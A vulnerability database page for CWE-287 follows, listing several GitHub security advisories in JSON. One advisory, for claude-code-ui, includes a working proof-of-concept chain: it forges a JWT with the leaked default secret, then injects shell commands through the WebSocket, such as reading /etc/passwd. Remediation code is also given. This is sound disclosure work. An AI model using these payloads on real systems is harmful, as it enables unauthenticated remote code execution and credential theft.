CWE-287
DiscouragedImproper Authentication
Abstraction: Class · Status: Draft
When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.
5968 vulnerabilities reference this CWE, most recent first.
GHSA-GV26-X27M-RFG3
Vulnerability from github – Published: 2022-09-25 00:00 – Updated: 2022-09-27 00:00A improper authentication vulnerability exists in Rocket.Chat <v5, <v4.8.2 and <v4.7.5 that allowed two factor authentication can be bypassed when telling the server to use CAS during login.
{
"affected": [],
"aliases": [
"CVE-2022-35248"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-09-23T19:15:00Z",
"severity": "HIGH"
},
"details": "A improper authentication vulnerability exists in Rocket.Chat \u003cv5, \u003cv4.8.2 and \u003cv4.7.5 that allowed two factor authentication can be bypassed when telling the server to use CAS during login.",
"id": "GHSA-gv26-x27m-rfg3",
"modified": "2022-09-27T00:00:17Z",
"published": "2022-09-25T00:00:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35248"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/1448268"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GV3C-8HG4-9HXX
Vulnerability from github – Published: 2022-05-21 00:01 – Updated: 2022-06-02 00:00Multi Store Inventory Management System v1.0 allows attackers to perform an account takeover via a crafted POST request.
{
"affected": [],
"aliases": [
"CVE-2022-28993"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-20T13:15:00Z",
"severity": "CRITICAL"
},
"details": "Multi Store Inventory Management System v1.0 allows attackers to perform an account takeover via a crafted POST request.",
"id": "GHSA-gv3c-8hg4-9hxx",
"modified": "2022-06-02T00:00:21Z",
"published": "2022-05-21T00:01:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28993"
},
{
"type": "WEB",
"url": "https://packetstormsecurity.com/files/166591/Multi-Store-Inventory-Management-System-1.0-Account-Takeover.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GV4M-V8C8-HR3G
Vulnerability from github – Published: 2026-05-28 18:30 – Updated: 2026-07-02 18:36Casdoor versions 2.362.0 and earlier contain a logic flaw in the social‑login binding flow that allows users to bypass configured MFA requirements. The binding‑rule code path in controllers/auth.go calls HandleLoggedIn directly without invoking checkMfaEnable. Any user authenticating via this path is logged in without MFA enforcement.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/casdoor/casdoor"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.1000.1-0.20260321120606-239e8bd69487"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-9091"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-02T18:36:38Z",
"nvd_published_at": "2026-05-28T17:16:33Z",
"severity": "MODERATE"
},
"details": "Casdoor versions 2.362.0 and earlier contain a logic flaw in the social\u2011login binding flow that allows users to bypass configured MFA requirements. The binding\u2011rule code path in controllers/auth.go calls HandleLoggedIn directly without invoking checkMfaEnable. Any user authenticating via this path is logged in without MFA enforcement.",
"id": "GHSA-gv4m-v8c8-hr3g",
"modified": "2026-07-02T18:36:38Z",
"published": "2026-05-28T18:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9091"
},
{
"type": "PACKAGE",
"url": "https://github.com/casdoor/casdoor"
},
{
"type": "WEB",
"url": "https://kb.cert.org/vuls/id/780781"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Casdoor allows users to bypass configured MFA requirements"
}
GHSA-GV5C-CRRP-M3Q4
Vulnerability from github – Published: 2022-05-24 16:49 – Updated: 2024-04-04 01:12iDoors Reader 2.10.17 and earlier allows an attacker on the same network segment to bypass authentication to access the management console and operate the product via unspecified vectors.
{
"affected": [],
"aliases": [
"CVE-2019-5964"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-07-05T14:15:00Z",
"severity": "HIGH"
},
"details": "iDoors Reader 2.10.17 and earlier allows an attacker on the same network segment to bypass authentication to access the management console and operate the product via unspecified vectors.",
"id": "GHSA-gv5c-crrp-m3q4",
"modified": "2024-04-04T01:12:05Z",
"published": "2022-05-24T16:49:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-5964"
},
{
"type": "WEB",
"url": "https://idoors.jp/info/20190701"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN28218613/index.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GV5V-VGX2-HGVR
Vulnerability from github – Published: 2022-05-17 03:02 – Updated: 2022-05-17 03:02The Debian initrd script for the cryptsetup package 2:1.7.3-2 and earlier allows physically proximate attackers to gain shell access via many log in attempts with an invalid password.
{
"affected": [],
"aliases": [
"CVE-2016-4484"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-01-23T21:59:00Z",
"severity": "HIGH"
},
"details": "The Debian initrd script for the cryptsetup package 2:1.7.3-2 and earlier allows physically proximate attackers to gain shell access via many log in attempts with an invalid password.",
"id": "GHSA-gv5v-vgx2-hgvr",
"modified": "2022-05-17T03:02:45Z",
"published": "2022-05-17T03:02:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4484"
},
{
"type": "WEB",
"url": "https://gitlab.com/cryptsetup/cryptsetup/commit/ef8a7d82d8d3716ae9b58179590f7908981fa0cb"
},
{
"type": "WEB",
"url": "http://hmarco.org/bugs/CVE-2016-4484/CVE-2016-4484_cryptsetup_initrd_shell.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/11/14/13"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/11/15/1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/11/15/4"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/11/16/6"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/94315"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GV6G-6Q5C-XWRM
Vulnerability from github – Published: 2022-05-17 02:17 – Updated: 2022-05-17 02:17Multiple unspecified vulnerabilities in the Backup Exec remote-agent logon process in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allow remote attackers to bypass authentication, and read or delete files, via unknown vectors.
{
"affected": [],
"aliases": [
"CVE-2008-5407"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-12-10T06:44:00Z",
"severity": "HIGH"
},
"details": "Multiple unspecified vulnerabilities in the Backup Exec remote-agent logon process in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allow remote attackers to bypass authentication, and read or delete files, via unknown vectors.",
"id": "GHSA-gv6g-6q5c-xwrm",
"modified": "2022-05-17T02:17:39Z",
"published": "2022-05-17T02:17:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-5407"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/46730"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/32810"
},
{
"type": "WEB",
"url": "http://securityresponse.symantec.com/avcenter/security/Content/2008.11.19.html"
},
{
"type": "WEB",
"url": "http://seer.entsupport.symantec.com/docs/314528.htm"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/32347"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id?1021246"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2008/3209"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-GV8F-WPM2-M5WR
Vulnerability from github – Published: 2026-03-11 00:37 – Updated: 2026-03-11 20:58Security Advisory: Insecure Default JWT Secret + WebSocket Auth Bypass Enables Unauthenticated RCE via Shell Injection
Download: cve_claudecodeui_submission_v2.zip
Submission Info
| Field | Value |
|---|---|
| Package | @siteboon/claude-code-ui |
| Ecosystem | npm |
| Affected versions | <= 1.24.0 (latest) |
| Severity | Critical |
| CVSS Score | 9.8 |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-1188, CWE-287, CWE-78 |
| Reported | 2026-03-02 |
| Researcher | Ethan-Yang (OPCIA) |
Summary
Three chained vulnerabilities allow unauthenticated remote code execution on any claudecodeui instance running with default configuration. No account, credentials, or prior access is required.
The root cause of RCE is OS command injection (CWE-78) in the WebSocket shell handler. Authentication is bypassed by combining an insecure default JWT secret (CWE-1188) with a WebSocket authentication function that skips database user validation (CWE-287).
Vulnerability Details
1. Insecure Default JWT Secret — CWE-1188
File: server/middleware/auth.js, line 6
const JWT_SECRET = process.env.JWT_SECRET || 'claude-ui-dev-secret-change-in-production';
The server uses an environment variable for JWT_SECRET, but falls back to a
well-known default value when the variable is not set. Critically, JWT_SECRET is
not included in .env.example, so the majority of users deploy without setting it,
leaving the fallback value in effect.
Since this default string is published verbatim in the public source code, any attacker can use it to sign arbitrary JWT tokens.
2. WebSocket Authentication Skips Database Validation — CWE-287
File: server/middleware/auth.js, lines 82–108
authenticateWebSocket() only verifies the JWT signature. It does not check
whether the userId in the payload actually exists in the database — unlike
authenticateToken() which is used for REST endpoints and does perform this check:
// authenticateWebSocket() — VULNERABLE
const decoded = jwt.verify(token, JWT_SECRET);
return decoded; // ← userId never verified against DB
// authenticateToken() — CORRECT (REST endpoints)
const decoded = jwt.verify(token, JWT_SECRET);
const user = userDb.getUserById(decoded.userId); // ← DB check present
if (!user) return res.status(401)...
A forged token with a non-existent userId passes WebSocket authentication,
bypassing access control entirely.
3. OS Command Injection via WebSocket Shell — CWE-78
File: server/index.js, line 1179
shellCommand = `cd "${projectPath}" && ${initialCommand}`;
Both projectPath and initialCommand are taken directly from the WebSocket message
payload and interpolated into a bash command string without any sanitization,
enabling arbitrary OS command execution.
A secondary injection vector exists at line 1257 via unsanitized sessionId:
shellCommand = `cd "${projectPath}" && claude --resume ${sessionId} || claude`;
Proof of Concept
Requirements: Node.js, jsonwebtoken, ws
import jwt from 'jsonwebtoken';
import WebSocket from 'ws';
// Step 1: Sign a token with the publicly known default secret
const token = jwt.sign(
{ userId: 1337, username: 'attacker' },
'claude-ui-dev-secret-change-in-production'
);
// Step 2: Connect to /shell WebSocket — auth passes because
// authenticateWebSocket() does not verify userId in DB
const ws = new WebSocket(`ws://TARGET_HOST:3001/shell?token=${token}`);
ws.on('open', () => {
// Step 3: initialCommand is injected directly into bash
ws.send(JSON.stringify({
type: 'init',
projectPath: '/tmp',
initialCommand: 'id && cat /etc/passwd',
isPlainShell: true,
hasSession: false
}));
});
ws.on('message', (data) => {
const msg = JSON.parse(data);
if (msg.type === 'output') process.stdout.write(msg.data);
});
Actual output observed during testing:
uid=1001(user) gid=1001(user) groups=1001(user),27(sudo)
ubuntu
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
Secondary vector — projectPath double-quote escape injection
ws.send(JSON.stringify({
type: 'init',
projectPath: '" && id && echo "pwned" # ',
provider: 'claude',
hasSession: false
}));
// Server executes: cd "" && id && echo "pwned" # " && claude
// Output: uid=1001... / pwned
Additional Findings
| CWE | Location | Description |
|---|---|---|
| CWE-306 | server/routes/auth.js:22 |
/api/auth/register requires no authentication — first caller becomes admin |
| CWE-942 | server/index.js:325 |
cors() with no options sets Access-Control-Allow-Origin: * |
| CWE-613 | server/middleware/auth.js:70 |
generateToken() sets no expiresIn — tokens never expire |
Impact
Any claudecodeui instance accessible over the network where JWT_SECRET is not
explicitly configured (the default case, as it is absent from .env.example) is
vulnerable to:
- Full OS command execution as the server process user
- File system read/write access
- Credential theft (SSH keys,
.envfiles, API keys stored on the host) - Lateral movement within the host network
The attack requires zero authentication and succeeds immediately after default installation.
Remediation
Fix 1 — Enforce explicit JWT_SECRET; remove insecure default
// server/middleware/auth.js
const JWT_SECRET = process.env.JWT_SECRET;
if (!JWT_SECRET) {
console.error('[FATAL] JWT_SECRET environment variable must be set');
process.exit(1);
}
Also add JWT_SECRET= to .env.example with a clear instruction to set a strong random value.
Fix 2 — Add DB user existence check in WebSocket authentication
const authenticateWebSocket = (token) => {
if (!token) return null;
try {
const decoded = jwt.verify(token, JWT_SECRET);
const user = userDb.getUserById(decoded.userId); // ← add
if (!user) return null; // ← add
return user;
} catch (error) {
return null;
}
};
Fix 3 — Replace shell string interpolation with spawn argument array
// Instead of:
const shellProcess = pty.spawn('bash', ['-c', `cd "${projectPath}" && ${initialCommand}`], ...);
// Use:
const shellProcess = pty.spawn(initialCommand.split(' ')[0], initialCommand.split(' ').slice(1), {
cwd: projectPath // pass path as cwd, not shell string
});
Fix 4 — Additional hardening
- Add
expiresIn: '24h'togenerateToken() - Restrict CORS to specific trusted origins
- Rate-limit and restrict
/api/auth/registerto localhost on initial setup
Timeline
| Date | Event |
|---|---|
| 2026-03-02 | Vulnerabilities discovered and verified via PoC |
| 2026-03-02 | Private advisory submitted to maintainer |
| 2026-06-01 | Public disclosure (90-day deadline) |
Researcher
Ethan-Yang — OPCIA
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.24.0"
},
"package": {
"ecosystem": "npm",
"name": "@siteboon/claude-code-ui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.25.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-31975"
],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-287",
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-11T00:37:25Z",
"nvd_published_at": "2026-03-11T18:16:27Z",
"severity": "HIGH"
},
"details": "# Security Advisory: Insecure Default JWT Secret + WebSocket Auth Bypass Enables Unauthenticated RCE via Shell Injection\nDownload: [cve_claudecodeui_submission_v2.zip](https://github.com/user-attachments/files/25686652/cve_claudecodeui_submission_v2.zip)\n\n## \uf4cb Submission Info\n\n| Field | Value |\n|-------|-------|\n| **Package** | `@siteboon/claude-code-ui` |\n| **Ecosystem** | npm |\n| **Affected versions** | `\u003c= 1.24.0` (latest) |\n| **Severity** | Critical |\n| **CVSS Score** | 9.8 |\n| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |\n| **CWE** | CWE-1188, CWE-287, CWE-78 |\n| **Reported** | 2026-03-02 |\n| **Researcher** | Ethan-Yang (OPCIA) |\n\n---\n\n## Summary\n\nThree chained vulnerabilities allow **unauthenticated remote code execution** on any\nclaudecodeui instance running with default configuration. No account, credentials, or\nprior access is required.\n\nThe root cause of RCE is **OS command injection (CWE-78)** in the WebSocket shell\nhandler. Authentication is bypassed by combining an insecure default JWT secret\n**(CWE-1188)** with a WebSocket authentication function that skips database user\nvalidation **(CWE-287)**.\n\n---\n\n## Vulnerability Details\n\n### 1. Insecure Default JWT Secret \u2014 `CWE-1188`\n\n**File**: `server/middleware/auth.js`, line 6\n\n```javascript\nconst JWT_SECRET = process.env.JWT_SECRET || \u0027claude-ui-dev-secret-change-in-production\u0027;\n```\n\nThe server uses an environment variable for `JWT_SECRET`, but falls back to a\nwell-known default value when the variable is not set. Critically, `JWT_SECRET` is\n**not included in `.env.example`**, so the majority of users deploy without setting it,\nleaving the fallback value in effect.\n\nSince this default string is published verbatim in the public source code, any attacker\ncan use it to sign arbitrary JWT tokens.\n\n---\n\n### 2. WebSocket Authentication Skips Database Validation \u2014 `CWE-287`\n\n**File**: `server/middleware/auth.js`, lines 82\u2013108\n\n`authenticateWebSocket()` only verifies the JWT **signature**. It does **not** check\nwhether the `userId` in the payload actually exists in the database \u2014 unlike\n`authenticateToken()` which is used for REST endpoints and does perform this check:\n\n```javascript\n// authenticateWebSocket() \u2014 VULNERABLE\nconst decoded = jwt.verify(token, JWT_SECRET);\nreturn decoded; // \u2190 userId never verified against DB\n\n// authenticateToken() \u2014 CORRECT (REST endpoints)\nconst decoded = jwt.verify(token, JWT_SECRET);\nconst user = userDb.getUserById(decoded.userId); // \u2190 DB check present\nif (!user) return res.status(401)...\n```\n\nA forged token with a non-existent `userId` passes WebSocket authentication,\nbypassing access control entirely.\n\n---\n\n### 3. OS Command Injection via WebSocket Shell \u2014 `CWE-78`\n\n**File**: `server/index.js`, line 1179\n\n```javascript\n\nshellCommand = `cd \"${projectPath}\" \u0026\u0026 ${initialCommand}`;\n```\n\nBoth `projectPath` and `initialCommand` are taken directly from the WebSocket message\npayload and interpolated into a bash command string without any sanitization,\nenabling arbitrary OS command execution.\n\nA secondary injection vector exists at line 1257 via unsanitized `sessionId`:\n\n```javascript\nshellCommand = `cd \"${projectPath}\" \u0026\u0026 claude --resume ${sessionId} || claude`;\n```\n\n---\n\n## Proof of Concept\n\n**Requirements**: Node.js, `jsonwebtoken`, `ws`\n\n```javascript\nimport jwt from \u0027jsonwebtoken\u0027;\nimport WebSocket from \u0027ws\u0027;\n\n// Step 1: Sign a token with the publicly known default secret\nconst token = jwt.sign(\n { userId: 1337, username: \u0027attacker\u0027 },\n \u0027claude-ui-dev-secret-change-in-production\u0027\n);\n\n// Step 2: Connect to /shell WebSocket \u2014 auth passes because\n// authenticateWebSocket() does not verify userId in DB\nconst ws = new WebSocket(`ws://TARGET_HOST:3001/shell?token=${token}`);\n\nws.on(\u0027open\u0027, () =\u003e {\n // Step 3: initialCommand is injected directly into bash\n ws.send(JSON.stringify({\n type: \u0027init\u0027,\n projectPath: \u0027/tmp\u0027,\n initialCommand: \u0027id \u0026\u0026 cat /etc/passwd\u0027,\n isPlainShell: true,\n hasSession: false\n }));\n});\n\nws.on(\u0027message\u0027, (data) =\u003e {\n const msg = JSON.parse(data);\n if (msg.type === \u0027output\u0027) process.stdout.write(msg.data);\n});\n```\n\n**Actual output observed during testing:**\n```\nuid=1001(user) gid=1001(user) groups=1001(user),27(sudo)\nubuntu\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n...\n```\n\n### Secondary vector \u2014 `projectPath` double-quote escape injection\n\n```javascript\nws.send(JSON.stringify({\n type: \u0027init\u0027,\n projectPath: \u0027\" \u0026\u0026 id \u0026\u0026 echo \"pwned\" # \u0027,\n provider: \u0027claude\u0027,\n hasSession: false\n}));\n// Server executes: cd \"\" \u0026\u0026 id \u0026\u0026 echo \"pwned\" # \" \u0026\u0026 claude\n// Output: uid=1001... / pwned\n```\n\n---\n\n## Additional Findings\n\n| CWE | Location | Description |\n|-----|----------|-------------|\n| CWE-306 | `server/routes/auth.js:22` | `/api/auth/register` requires no authentication \u2014 first caller becomes admin |\n| CWE-942 | `server/index.js:325` | `cors()` with no options sets `Access-Control-Allow-Origin: *` |\n| CWE-613 | `server/middleware/auth.js:70` | `generateToken()` sets no `expiresIn` \u2014 tokens never expire |\n\n---\n\n## Impact\n\nAny claudecodeui instance accessible over the network where `JWT_SECRET` is not\nexplicitly configured (the default case, as it is absent from `.env.example`) is\nvulnerable to:\n\n- **Full OS command execution** as the server process user\n- **File system read/write** access\n- **Credential theft** (SSH keys, `.env` files, API keys stored on the host)\n- **Lateral movement** within the host network\n\nThe attack requires **zero authentication** and succeeds immediately after\ndefault installation.\n\n---\n\n## Remediation\n\n### Fix 1 \u2014 Enforce explicit JWT_SECRET; remove insecure default\n```javascript\n// server/middleware/auth.js\nconst JWT_SECRET = process.env.JWT_SECRET;\nif (!JWT_SECRET) {\n console.error(\u0027[FATAL] JWT_SECRET environment variable must be set\u0027);\n process.exit(1);\n}\n```\nAlso add `JWT_SECRET=` to `.env.example` with a clear instruction to set a strong random value.\n\n### Fix 2 \u2014 Add DB user existence check in WebSocket authentication\n```javascript\nconst authenticateWebSocket = (token) =\u003e {\n if (!token) return null;\n try {\n const decoded = jwt.verify(token, JWT_SECRET);\n const user = userDb.getUserById(decoded.userId); // \u2190 add\n if (!user) return null; // \u2190 add\n return user;\n } catch (error) {\n return null;\n }\n};\n```\n\n### Fix 3 \u2014 Replace shell string interpolation with spawn argument array\n```javascript\n// Instead of:\nconst shellProcess = pty.spawn(\u0027bash\u0027, [\u0027-c\u0027, `cd \"${projectPath}\" \u0026\u0026 ${initialCommand}`], ...);\n\n// Use:\nconst shellProcess = pty.spawn(initialCommand.split(\u0027 \u0027)[0], initialCommand.split(\u0027 \u0027).slice(1), {\n cwd: projectPath // pass path as cwd, not shell string\n});\n```\n\n### Fix 4 \u2014 Additional hardening\n- Add `expiresIn: \u002724h\u0027` to `generateToken()`\n- Restrict CORS to specific trusted origins\n- Rate-limit and restrict `/api/auth/register` to localhost on initial setup\n\n---\n\n## Timeline\n\n| Date | Event |\n|------|-------|\n| 2026-03-02 | Vulnerabilities discovered and verified via PoC |\n| 2026-03-02 | Private advisory submitted to maintainer |\n| 2026-06-01 | Public disclosure (90-day deadline) |\n\n---\n\n## Researcher\n\n**Ethan-Yang** \u2014 OPCIA",
"id": "GHSA-gv8f-wpm2-m5wr",
"modified": "2026-03-11T20:58:52Z",
"published": "2026-03-11T00:37:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/siteboon/claudecodeui/security/advisories/GHSA-gv8f-wpm2-m5wr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31975"
},
{
"type": "WEB",
"url": "https://github.com/siteboon/claudecodeui/commit/12e7f074d9563b3264caf9cec6e1b701c301af26"
},
{
"type": "PACKAGE",
"url": "https://github.com/siteboon/claudecodeui"
},
{
"type": "WEB",
"url": "https://github.com/siteboon/claudecodeui/releases/tag/v1.25.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "@siteboon/claude-code-ui Vulnerable to Unauthenticated RCE via WebSocket Shell Injection"
}
GHSA-GV97-CHP3-8XHH
Vulnerability from github – Published: 2022-05-24 17:36 – Updated: 2022-05-24 17:36The REST API component of TIBCO Software Inc.'s TIBCO PartnerExpress contains a vulnerability that theoretically allows an unauthenticated attacker with network access to obtain an authenticated login URL for the affected system via a REST API. Affected releases are TIBCO Software Inc.'s TIBCO PartnerExpress: version 6.2.0.
{
"affected": [],
"aliases": [
"CVE-2020-27147"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-12-15T18:15:00Z",
"severity": "MODERATE"
},
"details": "The REST API component of TIBCO Software Inc.\u0027s TIBCO PartnerExpress contains a vulnerability that theoretically allows an unauthenticated attacker with network access to obtain an authenticated login URL for the affected system via a REST API. Affected releases are TIBCO Software Inc.\u0027s TIBCO PartnerExpress: version 6.2.0.",
"id": "GHSA-gv97-chp3-8xhh",
"modified": "2022-05-24T17:36:32Z",
"published": "2022-05-24T17:36:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27147"
},
{
"type": "WEB",
"url": "https://www.tibco.com/support/advisories/2020/12/tibco-security-advisory-december-15-2020-tibco-partnerexpress"
},
{
"type": "WEB",
"url": "http://www.tibco.com/services/support/advisories"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-GV9V-C375-HVMG
Vulnerability from github – Published: 2022-05-13 01:01 – Updated: 2022-07-07 23:04The ActiveDirectoryLdapAuthenticator in Spring Security 3.2.0 to 3.2.1 and 3.1.0 to 3.1.5 does not check the password length. If the directory allows anonymous binds then it may incorrectly authenticate a user who supplies an empty password.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.2.1.RELEASE"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.security:spring-security-core"
},
"ranges": [
{
"events": [
{
"introduced": "3.2.0"
},
{
"fixed": "3.2.2.RELEASE"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.4.RELEASE"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.security:spring-security-core"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.0"
},
{
"fixed": "3.1.5.RELEASE"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2014-0097"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2022-07-07T23:04:22Z",
"nvd_published_at": "2017-05-25T17:29:00Z",
"severity": "HIGH"
},
"details": "The ActiveDirectoryLdapAuthenticator in Spring Security 3.2.0 to 3.2.1 and 3.1.0 to 3.1.5 does not check the password length. If the directory allows anonymous binds then it may incorrectly authenticate a user who supplies an empty password.",
"id": "GHSA-gv9v-c375-hvmg",
"modified": "2022-07-07T23:04:22Z",
"published": "2022-05-13T01:01:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0097"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-security/commit/7dbb8e777ece8675f3333a1ef1cb4d6b9be80395"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-security/commit/88559882e967085c47a7e1dcbc4dc32c2c796868"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-security/commit/a7005bd74241ac8e2e7b38ae31bc4b0f641ef973"
},
{
"type": "WEB",
"url": "https://jira.springsource.org/browse/SEC-2500"
},
{
"type": "WEB",
"url": "https://pivotal.io/security/cve-2014-0097"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Improper Authentication in Spring Security"
}
GHSA-GVFJ-FXX3-J323
Vulnerability from github – Published: 2022-12-31 03:30 – Updated: 2024-05-20 21:43An issue was discovered in Mellium mellium.im/sasl before 0.3.1. When performing SCRAM-based SASL authentication, if the remote end advertises support for channel binding, no random nonce is generated (instead, the nonce is empty). This causes authentication to fail in the best case, but (if paired with a remote end that does not validate the length of the nonce) could lead to insufficient randomness being used during authentication.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "mellium.im/sasl"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-48195"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2023-01-04T13:56:47Z",
"nvd_published_at": "2022-12-31T01:15:00Z",
"severity": "CRITICAL"
},
"details": "An issue was discovered in Mellium mellium.im/sasl before 0.3.1. When performing SCRAM-based SASL authentication, if the remote end advertises support for channel binding, no random nonce is generated (instead, the nonce is empty). This causes authentication to fail in the best case, but (if paired with a remote end that does not validate the length of the nonce) could lead to insufficient randomness being used during authentication.",
"id": "GHSA-gvfj-fxx3-j323",
"modified": "2024-05-20T21:43:00Z",
"published": "2022-12-31T03:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-48195"
},
{
"type": "PACKAGE",
"url": "https://codeberg.org/mellium/sasl"
},
{
"type": "WEB",
"url": "https://codeberg.org/mellium/sasl/commit/e6cbf681b247c4efa1477eaad2cc47a01707b732"
},
{
"type": "WEB",
"url": "https://codeberg.org/mellium/sasl/releases/tag/v0.3.1"
},
{
"type": "WEB",
"url": "https://mellium.im/cve/cve-2022-48195"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2023-1268"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "mellium.im/sasl authentication failure due to insufficient nonce randomness"
}
Mitigation
Strategy: Libraries or Frameworks
Use an authentication framework or library such as the OWASP ESAPI Authentication feature.
CAPEC-114: Authentication Abuse
An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.
CAPEC-115: Authentication Bypass
An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.
CAPEC-151: Identity Spoofing
